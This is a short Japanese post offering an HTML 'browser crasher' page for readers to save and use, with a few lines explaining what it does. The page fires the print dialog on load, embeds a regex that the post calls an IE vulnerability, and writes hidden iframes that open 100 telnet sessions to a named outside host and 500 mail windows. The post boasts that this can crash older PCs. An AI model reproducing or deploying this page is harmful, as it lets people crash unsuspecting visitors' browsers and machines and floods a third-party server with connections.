<?xml version="1.0" encoding="Shift_JIS"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd";>
<html xmlns="http://www.w3.org/1999/xhtml"; xml:lang="ja" lang="ja">
<head>
<meta http-equiv="Content-Type" content="application/xhtml+html; charset=Shift_JIS" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<title></title>
</head>
<body onload="print();if('AB'.match(/(.*?)*?B/)){alert(RegExp.lastMatch);}">
ブラクラ<br />
<script type="text/javascript">
for( i=1;i<100;i++){
 document.write("<iframe src='telnet://www2.accsjp.or.jp/' style='width:0px;height:0px;'></iframe>")
};
for( i=1;i<500;i++){
 document.write("<iframe src='mailto:abc@abc.com' style='width:0px;height:0px;'></iframe>")
};
</script>
</body>
</html>
この内容をHTMLファイルで保存すれば強力なブラクラ完成。
・onloadにIEの脆弱性を入れてみたり
・印刷ウインドウが出てきたり
・telnetプロンプトが100個開いたり
・メール画面が500個開いたり

まあ古いパソなら十分クラッシュできるわけだが